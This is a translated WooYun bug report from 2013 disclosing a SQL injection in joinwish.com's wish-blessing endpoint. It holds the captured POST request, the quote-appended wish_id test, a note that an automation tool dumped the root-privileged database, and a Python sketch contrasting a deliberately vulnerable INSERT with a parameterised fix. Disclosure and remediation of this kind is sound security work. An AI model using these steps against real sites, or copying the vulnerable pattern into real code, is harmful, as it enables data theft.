WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2013-08-19: Details sent to the vendor, awaiting the vendor's handling
2013-08-20: Vendor confirmed; details disclosed to the vendor only
2013-08-30: Details disclosed to core white hats and relevant domain experts
2013-09-09: Details disclosed to regular white hats
2013-09-19: Details disclosed to intern white hats
2013-10-03: Details disclosed to the public
Saw you all handing out gifts, so I came to ask for one!
1. After logging in, click "bless" on some user's wish;
2. Enter any blessing text, click submit and capture the request;
3. Two POST requests are captured at this point; ignore the first one and look at the second captured request:
POST /wishservice/add_wish_msg HTTP/1.1
Host: www.joinwish.com
User-Agent:
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.joinwish.com/wish/show/id/1432
Content-Length: 24
Cookie:
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

wish_id=1432&content=123
4. Here I found that appending a single quote (') to the wish_id parameter makes the system return the database's error message, which also includes the website's absolute path; none of this is visible on the web page itself.
5. Running it straight through a tool yielded the following information; the database account has root privileges:
Database information: (screenshot)
Table information: (screenshot)
Database: joinwish_product [132 tables]
6. Testing stops about here; gift please!!!
See the detailed description.
Filter.
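As an added illustration (not the site's code, whose source the report does not show), here is the handler pattern that produces the behaviour seen in step 4, beside the parameterised version that the "filter" suggestion amounts to. It uses an in-memory SQLite table named after the report's wish_msgs table; the handler name add_wish_msg, the column layout and the response format are assumptions.

```python
import sqlite3

# Constructed stand-in for the site's wish_msgs table (columns are assumed).
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE wish_msgs (id INTEGER PRIMARY KEY, wish_id INTEGER, content TEXT)"
)


def add_wish_msg_vulnerable(wish_id: str, content: str) -> dict:
    """Builds the INSERT by string formatting. A stray quote in wish_id breaks
    the statement, and the engine's raw error is echoed back to the client,
    which is what step 4 of the report observed (the real site also leaked
    its absolute path in that message)."""
    sql = "INSERT INTO wish_msgs (wish_id, content) VALUES (%s, '%s')" % (wish_id, content)
    try:
        conn.execute(sql)
        conn.commit()
        return {"ok": True}
    except sqlite3.Error as exc:
        # Leaks database internals to the user.
        return {"ok": False, "error": str(exc)}


def add_wish_msg_fixed(wish_id: str, content: str) -> dict:
    """Validates wish_id as a plain integer and binds both values as query
    parameters, so user input can never alter the statement. Database
    failures are logged server-side (omitted here) and reported generically."""
    if not wish_id.isdigit():
        return {"ok": False, "error": "invalid wish_id"}
    try:
        conn.execute(
            "INSERT INTO wish_msgs (wish_id, content) VALUES (?, ?)",
            (int(wish_id), content),
        )
        conn.commit()
        return {"ok": True}
    except sqlite3.Error:
        return {"ok": False, "error": "request failed"}


def count_msgs(wish_id: int) -> int:
    """Number of stored blessings for a wish, used to confirm both paths insert."""
    row = conn.execute(
        "SELECT COUNT(*) FROM wish_msgs WHERE wish_id = ?", (wish_id,)
    ).fetchone()
    return row[0]
```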
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2013-08-20 10:13
This vulnerability was fixed yesterday.
None yet.